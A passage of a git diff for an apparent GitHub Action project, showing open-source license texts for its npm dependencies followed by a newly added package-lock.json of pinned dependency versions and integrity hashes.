+ + +@actions/io +MIT +The MIT License (MIT) + +Copyright 2019 GitHub + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + +@actions/tool-cache +MIT +The MIT License (MIT) + +Copyright 2019 GitHub + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + +@fastify/busboy +MIT +Copyright Brian White. All rights reserved. + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to +deal in the Software without restriction, including without limitation the +rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +sell copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +IN THE SOFTWARE. + +semver +ISC +The ISC License + +Copyright (c) Isaac Z. Schlueter and Contributors + +Permission to use, copy, modify, and/or distribute this software for any +purpose with or without fee is hereby granted, provided that the above +copyright notice and this permission notice appear in all copies. + +THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS. 
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR +IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + + +tunnel +MIT +The MIT License (MIT) + +Copyright (c) 2012 Koichi Kobayashi + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +THE SOFTWARE. 
+ + +undici +MIT +MIT License + +Copyright (c) Matteo Collina and Undici contributors + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. + + +uuid +MIT +The MIT License (MIT) + +Copyright (c) 2010-2020 Robert Kieffer and other contributors + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. 
+ +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/.github/action/package-lock.json b/.github/action/package-lock.json new file mode 100644 index 000000000000..eef94f4b5cd8 --- /dev/null +++ b/.github/action/package-lock.json 
@@ -0,0 +1,639 @@ +{ + "name": "codeql-actions-action", + "version": "0.1.0", + "lockfileVersion": 2, + "requires": true, + "packages": { + "": { + "name": "codeql-actions-action", + "version": "0.1.0", + "license": "MIT", + "dependencies": { + "@actions/core": "^1.10.1", + "@actions/exec": "^1.1.1", + "@actions/github": "^5.1.1", + "@actions/tool-cache": "^2.0.1" + }, + "devDependencies": { + "@types/node": "^20.6.0", + "@vercel/ncc": "^0.38.0", + "prettier": "^3.0.3", + "typescript": "^5.2.2" + } + }, + "node_modules/@actions/core": { + "version": "1.10.1", + "resolved": "https://registry.npmjs.org/@actions/core/-/core-1.10.1.tgz", + "integrity": "sha512-3lBR9EDAY+iYIpTnTIXmWcNbX3T2kCkAEQGIQx4NVQ0575nk2k3GRZDTPQG+vVtS2izSLmINlxXf0uLtnrTP+g==", + "dependencies": { + "@actions/http-client": "^2.0.1", + "uuid": "^8.3.2" + } + }, + "node_modules/@actions/exec": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/@actions/exec/-/exec-1.1.1.tgz", + "integrity": "sha512-+sCcHHbVdk93a0XT19ECtO/gIXoxvdsgQLzb2fE2/5sIZmWQuluYyjPQtrtTHdU1YzTZ7bAPN4sITq2xi1679w==", + "dependencies": { + "@actions/io": "^1.0.1" + } + }, + "node_modules/@actions/github": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@actions/github/-/github-5.1.1.tgz", + "integrity": "sha512-Nk59rMDoJaV+mHCOJPXuvB1zIbomlKS0dmSIqPGxd0enAXBnOfn4VWF+CGtRCwXZG9Epa54tZA7VIRlJDS8A6g==", + "dependencies": { + "@actions/http-client": "^2.0.1", + "@octokit/core": "^3.6.0", + "@octokit/plugin-paginate-rest": "^2.17.0", + "@octokit/plugin-rest-endpoint-methods": "^5.13.0" + } + }, + "node_modules/@actions/http-client": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/@actions/http-client/-/http-client-2.2.0.tgz", + "integrity": "sha512-q+epW0trjVUUHboliPb4UF9g2msf+w61b32tAkFEwL/IwP0DQWgbCMM0Hbe3e3WXSKz5VcUXbzJQgy8Hkra/Lg==", + "dependencies": { + "tunnel": "^0.0.6", + "undici": "^5.25.4" + } + }, + "node_modules/@actions/io": { + "version": "1.1.3", + "resolved": 
"https://registry.npmjs.org/@actions/io/-/io-1.1.3.tgz", + "integrity": "sha512-wi9JjgKLYS7U/z8PPbco+PvTb/nRWjeoFlJ1Qer83k/3C5PHQi28hiVdeE2kHXmIL99mQFawx8qt/JPjZilJ8Q==" + }, + "node_modules/@actions/tool-cache": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/@actions/tool-cache/-/tool-cache-2.0.1.tgz", + "integrity": "sha512-iPU+mNwrbA8jodY8eyo/0S/QqCKDajiR8OxWTnSk/SnYg0sj8Hp4QcUEVC1YFpHWXtrfbQrE13Jz4k4HXJQKcA==", + "dependencies": { + "@actions/core": "^1.2.6", + "@actions/exec": "^1.0.0", + "@actions/http-client": "^2.0.1", + "@actions/io": "^1.1.1", + "semver": "^6.1.0", + "uuid": "^3.3.2" + } + }, + "node_modules/@actions/tool-cache/node_modules/uuid": { + "version": "3.4.0", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", + "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", + "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. 
See https://v8.dev/blog/math-random for details.", + "bin": { + "uuid": "bin/uuid" + } + }, + "node_modules/@fastify/busboy": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/@fastify/busboy/-/busboy-2.1.0.tgz", + "integrity": "sha512-+KpH+QxZU7O4675t3mnkQKcZZg56u+K/Ct2K+N2AZYNVK8kyeo/bI18tI8aPm3tvNNRyTWfj6s5tnGNlcbQRsA==", + "engines": { + "node": ">=14" + } + }, + "node_modules/@octokit/auth-token": { + "version": "2.5.0", + "resolved": "https://registry.npmjs.org/@octokit/auth-token/-/auth-token-2.5.0.tgz", + "integrity": "sha512-r5FVUJCOLl19AxiuZD2VRZ/ORjp/4IN98Of6YJoJOkY75CIBuYfmiNHGrDwXr+aLGG55igl9QrxX3hbiXlLb+g==", + "dependencies": { + "@octokit/types": "^6.0.3" + } + }, + "node_modules/@octokit/core": { + "version": "3.6.0", + "resolved": "https://registry.npmjs.org/@octokit/core/-/core-3.6.0.tgz", + "integrity": "sha512-7RKRKuA4xTjMhY+eG3jthb3hlZCsOwg3rztWh75Xc+ShDWOfDDATWbeZpAHBNRpm4Tv9WgBMOy1zEJYXG6NJ7Q==", + "dependencies": { + "@octokit/auth-token": "^2.4.4", + "@octokit/graphql": "^4.5.8", + "@octokit/request": "^5.6.3", + "@octokit/request-error": "^2.0.5", + "@octokit/types": "^6.0.3", + "before-after-hook": "^2.2.0", + "universal-user-agent": "^6.0.0" + } + }, + "node_modules/@octokit/endpoint": { + "version": "6.0.12", + "resolved": "https://registry.npmjs.org/@octokit/endpoint/-/endpoint-6.0.12.tgz", + "integrity": "sha512-lF3puPwkQWGfkMClXb4k/eUT/nZKQfxinRWJrdZaJO85Dqwo/G0yOC434Jr2ojwafWJMYqFGFa5ms4jJUgujdA==", + "dependencies": { + "@octokit/types": "^6.0.3", + "is-plain-object": "^5.0.0", + "universal-user-agent": "^6.0.0" + } + }, + "node_modules/@octokit/graphql": { + "version": "4.8.0", + "resolved": "https://registry.npmjs.org/@octokit/graphql/-/graphql-4.8.0.tgz", + "integrity": "sha512-0gv+qLSBLKF0z8TKaSKTsS39scVKF9dbMxJpj3U0vC7wjNWFuIpL/z76Qe2fiuCbDRcJSavkXsVtMS6/dtQQsg==", + "dependencies": { + "@octokit/request": "^5.6.0", + "@octokit/types": "^6.0.3", + "universal-user-agent": "^6.0.0" + } + }, + 
"node_modules/@octokit/openapi-types": { + "version": "12.11.0", + "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-12.11.0.tgz", + "integrity": "sha512-VsXyi8peyRq9PqIz/tpqiL2w3w80OgVMwBHltTml3LmVvXiphgeqmY9mvBw9Wu7e0QWk/fqD37ux8yP5uVekyQ==" + }, + "node_modules/@octokit/plugin-paginate-rest": { + "version": "2.21.3", + "resolved": "https://registry.npmjs.org/@octokit/plugin-paginate-rest/-/plugin-paginate-rest-2.21.3.tgz", + "integrity": "sha512-aCZTEf0y2h3OLbrgKkrfFdjRL6eSOo8komneVQJnYecAxIej7Bafor2xhuDJOIFau4pk0i/P28/XgtbyPF0ZHw==", + "dependencies": { + "@octokit/types": "^6.40.0" + }, + "peerDependencies": { + "@octokit/core": ">=2" + } + }, + "node_modules/@octokit/plugin-rest-endpoint-methods": { + "version": "5.16.2", + "resolved": "https://registry.npmjs.org/@octokit/plugin-rest-endpoint-methods/-/plugin-rest-endpoint-methods-5.16.2.tgz", + "integrity": "sha512-8QFz29Fg5jDuTPXVtey05BLm7OB+M8fnvE64RNegzX7U+5NUXcOcnpTIK0YfSHBg8gYd0oxIq3IZTe9SfPZiRw==", + "dependencies": { + "@octokit/types": "^6.39.0", + "deprecation": "^2.3.1" + }, + "peerDependencies": { + "@octokit/core": ">=3" + } + }, + "node_modules/@octokit/request": { + "version": "5.6.3", + "resolved": "https://registry.npmjs.org/@octokit/request/-/request-5.6.3.tgz", + "integrity": "sha512-bFJl0I1KVc9jYTe9tdGGpAMPy32dLBXXo1dS/YwSCTL/2nd9XeHsY616RE3HPXDVk+a+dBuzyz5YdlXwcDTr2A==", + "dependencies": { + "@octokit/endpoint": "^6.0.1", + "@octokit/request-error": "^2.1.0", + "@octokit/types": "^6.16.1", + "is-plain-object": "^5.0.0", + "node-fetch": "^2.6.7", + "universal-user-agent": "^6.0.0" + } + }, + "node_modules/@octokit/request-error": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-2.1.0.tgz", + "integrity": "sha512-1VIvgXxs9WHSjicsRwq8PlR2LR2x6DwsJAaFgzdi0JfJoGSO8mYI/cHJQ+9FbN21aa+DrgNLnwObmyeSC8Rmpg==", + "dependencies": { + "@octokit/types": "^6.0.3", + "deprecation": "^2.0.0", + "once": "^1.4.0" + } + }, 
+ "node_modules/@octokit/types": { + "version": "6.41.0", + "resolved": "https://registry.npmjs.org/@octokit/types/-/types-6.41.0.tgz", + "integrity": "sha512-eJ2jbzjdijiL3B4PrSQaSjuF2sPEQPVCPzBvTHJD9Nz+9dw2SGH4K4xeQJ77YfTq5bRQ+bD8wT11JbeDPmxmGg==", + "dependencies": { + "@octokit/openapi-types": "^12.11.0" + } + }, + "node_modules/@types/node": { + "version": "20.11.19", + "resolved": "https://registry.npmjs.org/@types/node/-/node-20.11.19.tgz", + "integrity": "sha512-7xMnVEcZFu0DikYjWOlRq7NTPETrm7teqUT2WkQjrTIkEgUyyGdWsj/Zg8bEJt5TNklzbPD1X3fqfsHw3SpapQ==", + "dev": true, + "dependencies": { + "undici-types": "~5.26.4" + } + }, + "node_modules/@vercel/ncc": { + "version": "0.38.1", + "resolved": "https://registry.npmjs.org/@vercel/ncc/-/ncc-0.38.1.tgz", + "integrity": "sha512-IBBb+iI2NLu4VQn3Vwldyi2QwaXt5+hTyh58ggAMoCGE6DJmPvwL3KPBWcJl1m9LYPChBLE980Jw+CS4Wokqxw==", + "dev": true, + "bin": { + "ncc": "dist/ncc/cli.js" + } + }, + "node_modules/before-after-hook": { + "version": "2.2.3", + "resolved": "https://registry.npmjs.org/before-after-hook/-/before-after-hook-2.2.3.tgz", + "integrity": "sha512-NzUnlZexiaH/46WDhANlyR2bXRopNg4F/zuSA3OpZnllCUgRaOF2znDioDWrmbNVsuZk6l9pMquQB38cfBZwkQ==" + }, + "node_modules/deprecation": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/deprecation/-/deprecation-2.3.1.tgz", + "integrity": "sha512-xmHIy4F3scKVwMsQ4WnVaS8bHOx0DmVwRywosKhaILI0ywMDWPtBSku2HNxRvF7jtwDRsoEwYQSfbxj8b7RlJQ==" + }, + "node_modules/is-plain-object": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/is-plain-object/-/is-plain-object-5.0.0.tgz", + "integrity": "sha512-VRSzKkbMm5jMDoKLbltAkFQ5Qr7VDiTFGXxYFXXowVj387GeGNOCsOH6Msy00SGZ3Fp84b1Naa1psqgcCIEP5Q==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/node-fetch": { + "version": "2.7.0", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", + "integrity": 
"sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", + "dependencies": { + "whatwg-url": "^5.0.0" + }, + "engines": { + "node": "4.x || >=6.0.0" + }, + "peerDependencies": { + "encoding": "^0.1.0" + }, + "peerDependenciesMeta": { + "encoding": { + "optional": true + } + } + }, + "node_modules/once": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", + "dependencies": { + "wrappy": "1" + } + }, + "node_modules/prettier": { + "version": "3.2.5", + "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.2.5.tgz", + "integrity": "sha512-3/GWa9aOC0YeD7LUfvOG2NiDyhOWRvt1k+rcKhOuYnMY24iiCphgneUfJDyFXd6rZCAnuLBv6UeAULtrhT/F4A==", + "dev": true, + "bin": { + "prettier": "bin/prettier.cjs" + }, + "engines": { + "node": ">=14" + }, + "funding": { + "url": "https://github.com/prettier/prettier?sponsor=1" + } + }, + "node_modules/semver": { + "version": "6.3.1", + "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", + "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", + "bin": { + "semver": "bin/semver.js" + } + }, + "node_modules/tr46": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", + "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==" + }, + "node_modules/tunnel": { + "version": "0.0.6", + "resolved": "https://registry.npmjs.org/tunnel/-/tunnel-0.0.6.tgz", + "integrity": "sha512-1h/Lnq9yajKY2PEbBadPXj3VxsDDu844OnaAo52UVmIzIvwwtBPIuNvkjuzBlTWpfJyUbG3ez0KSBibQkj4ojg==", + "engines": { + "node": ">=0.6.11 <=0.7.0 || >=0.7.3" + } + }, + "node_modules/typescript": { + "version": "5.3.3", + "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.3.3.tgz", + "integrity": 
"sha512-pXWcraxM0uxAS+tN0AG/BF2TyqmHO014Z070UsJ+pFvYuRSq8KH8DmWpnbXe0pEPDHXZV3FcAbJkijJ5oNEnWw==", + "dev": true, + "bin": { + "tsc": "bin/tsc", + "tsserver": "bin/tsserver" + }, + "engines": { + "node": ">=14.17" + } + }, + "node_modules/undici": { + "version": "5.28.3", + "resolved": "https://registry.npmjs.org/undici/-/undici-5.28.3.tgz", + "integrity": "sha512-3ItfzbrhDlINjaP0duwnNsKpDQk3acHI3gVJ1z4fmwMK31k5G9OVIAMLSIaP6w4FaGkaAkN6zaQO9LUvZ1t7VA==", + "dependencies": { + "@fastify/busboy": "^2.0.0" + }, + "engines": { + "node": ">=14.0" + } + }, + "node_modules/undici-types": { + "version": "5.26.5", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-5.26.5.tgz", + "integrity": "sha512-JlCMO+ehdEIKqlFxk6IfVoAUVmgz7cU7zD/h9XZ0qzeosSHmUJVOzSQvvYSYWXkFXC+IfLKSIffhv0sVZup6pA==", + "dev": true + }, + "node_modules/universal-user-agent": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/universal-user-agent/-/universal-user-agent-6.0.1.tgz", + "integrity": "sha512-yCzhz6FN2wU1NiiQRogkTQszlQSlpWaw8SvVegAc+bDxbzHgh1vX8uIe8OYyMH6DwH+sdTJsgMl36+mSMdRJIQ==" + }, + "node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/webidl-conversions": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", + "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==" + }, + "node_modules/whatwg-url": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", + "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", + "dependencies": { + "tr46": "~0.0.3", + "webidl-conversions": "^3.0.0" + } + }, + 
"node_modules/wrappy": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", + "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" + } + }, + "dependencies": { + "@actions/core": { + "version": "1.10.1", + "resolved": "https://registry.npmjs.org/@actions/core/-/core-1.10.1.tgz", + "integrity": "sha512-3lBR9EDAY+iYIpTnTIXmWcNbX3T2kCkAEQGIQx4NVQ0575nk2k3GRZDTPQG+vVtS2izSLmINlxXf0uLtnrTP+g==", + "requires": { + "@actions/http-client": "^2.0.1", + "uuid": "^8.3.2" + } + }, + "@actions/exec": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/@actions/exec/-/exec-1.1.1.tgz", + "integrity": "sha512-+sCcHHbVdk93a0XT19ECtO/gIXoxvdsgQLzb2fE2/5sIZmWQuluYyjPQtrtTHdU1YzTZ7bAPN4sITq2xi1679w==", + "requires": { + "@actions/io": "^1.0.1" + } + }, + "@actions/github": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@actions/github/-/github-5.1.1.tgz", + "integrity": "sha512-Nk59rMDoJaV+mHCOJPXuvB1zIbomlKS0dmSIqPGxd0enAXBnOfn4VWF+CGtRCwXZG9Epa54tZA7VIRlJDS8A6g==", + "requires": { + "@actions/http-client": "^2.0.1", + "@octokit/core": "^3.6.0", + "@octokit/plugin-paginate-rest": "^2.17.0", + "@octokit/plugin-rest-endpoint-methods": "^5.13.0" + } + }, + "@actions/http-client": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/@actions/http-client/-/http-client-2.2.0.tgz", + "integrity": "sha512-q+epW0trjVUUHboliPb4UF9g2msf+w61b32tAkFEwL/IwP0DQWgbCMM0Hbe3e3WXSKz5VcUXbzJQgy8Hkra/Lg==", + "requires": { + "tunnel": "^0.0.6", + "undici": "^5.25.4" + } + }, + "@actions/io": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/@actions/io/-/io-1.1.3.tgz", + "integrity": "sha512-wi9JjgKLYS7U/z8PPbco+PvTb/nRWjeoFlJ1Qer83k/3C5PHQi28hiVdeE2kHXmIL99mQFawx8qt/JPjZilJ8Q==" + }, + "@actions/tool-cache": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/@actions/tool-cache/-/tool-cache-2.0.1.tgz", + "integrity": 
"sha512-iPU+mNwrbA8jodY8eyo/0S/QqCKDajiR8OxWTnSk/SnYg0sj8Hp4QcUEVC1YFpHWXtrfbQrE13Jz4k4HXJQKcA==", + "requires": { + "@actions/core": "^1.2.6", + "@actions/exec": "^1.0.0", + "@actions/http-client": "^2.0.1", + "@actions/io": "^1.1.1", + "semver": "^6.1.0", + "uuid": "^3.3.2" + }, + "dependencies": { + "uuid": { + "version": "3.4.0", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", + "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" + } + } + }, + "@fastify/busboy": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/@fastify/busboy/-/busboy-2.1.0.tgz", + "integrity": "sha512-+KpH+QxZU7O4675t3mnkQKcZZg56u+K/Ct2K+N2AZYNVK8kyeo/bI18tI8aPm3tvNNRyTWfj6s5tnGNlcbQRsA==" + }, + "@octokit/auth-token": { + "version": "2.5.0", + "resolved": "https://registry.npmjs.org/@octokit/auth-token/-/auth-token-2.5.0.tgz", + "integrity": "sha512-r5FVUJCOLl19AxiuZD2VRZ/ORjp/4IN98Of6YJoJOkY75CIBuYfmiNHGrDwXr+aLGG55igl9QrxX3hbiXlLb+g==", + "requires": { + "@octokit/types": "^6.0.3" + } + }, + "@octokit/core": { + "version": "3.6.0", + "resolved": "https://registry.npmjs.org/@octokit/core/-/core-3.6.0.tgz", + "integrity": "sha512-7RKRKuA4xTjMhY+eG3jthb3hlZCsOwg3rztWh75Xc+ShDWOfDDATWbeZpAHBNRpm4Tv9WgBMOy1zEJYXG6NJ7Q==", + "requires": { + "@octokit/auth-token": "^2.4.4", + "@octokit/graphql": "^4.5.8", + "@octokit/request": "^5.6.3", + "@octokit/request-error": "^2.0.5", + "@octokit/types": "^6.0.3", + "before-after-hook": "^2.2.0", + "universal-user-agent": "^6.0.0" + } + }, + "@octokit/endpoint": { + "version": "6.0.12", + "resolved": "https://registry.npmjs.org/@octokit/endpoint/-/endpoint-6.0.12.tgz", + "integrity": "sha512-lF3puPwkQWGfkMClXb4k/eUT/nZKQfxinRWJrdZaJO85Dqwo/G0yOC434Jr2ojwafWJMYqFGFa5ms4jJUgujdA==", + "requires": { + "@octokit/types": "^6.0.3", + "is-plain-object": "^5.0.0", + "universal-user-agent": "^6.0.0" + } + }, + "@octokit/graphql": { + "version": "4.8.0", + "resolved": 
"https://registry.npmjs.org/@octokit/graphql/-/graphql-4.8.0.tgz", + "integrity": "sha512-0gv+qLSBLKF0z8TKaSKTsS39scVKF9dbMxJpj3U0vC7wjNWFuIpL/z76Qe2fiuCbDRcJSavkXsVtMS6/dtQQsg==", + "requires": { + "@octokit/request": "^5.6.0", + "@octokit/types": "^6.0.3", + "universal-user-agent": "^6.0.0" + } + }, + "@octokit/openapi-types": { + "version": "12.11.0", + "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-12.11.0.tgz", + "integrity": "sha512-VsXyi8peyRq9PqIz/tpqiL2w3w80OgVMwBHltTml3LmVvXiphgeqmY9mvBw9Wu7e0QWk/fqD37ux8yP5uVekyQ==" + }, + "@octokit/plugin-paginate-rest": { + "version": "2.21.3", + "resolved": "https://registry.npmjs.org/@octokit/plugin-paginate-rest/-/plugin-paginate-rest-2.21.3.tgz", + "integrity": "sha512-aCZTEf0y2h3OLbrgKkrfFdjRL6eSOo8komneVQJnYecAxIej7Bafor2xhuDJOIFau4pk0i/P28/XgtbyPF0ZHw==", + "requires": { + "@octokit/types": "^6.40.0" + } + }, + "@octokit/plugin-rest-endpoint-methods": { + "version": "5.16.2", + "resolved": "https://registry.npmjs.org/@octokit/plugin-rest-endpoint-methods/-/plugin-rest-endpoint-methods-5.16.2.tgz", + "integrity": "sha512-8QFz29Fg5jDuTPXVtey05BLm7OB+M8fnvE64RNegzX7U+5NUXcOcnpTIK0YfSHBg8gYd0oxIq3IZTe9SfPZiRw==", + "requires": { + "@octokit/types": "^6.39.0", + "deprecation": "^2.3.1" + } + }, + "@octokit/request": { + "version": "5.6.3", + "resolved": "https://registry.npmjs.org/@octokit/request/-/request-5.6.3.tgz", + "integrity": 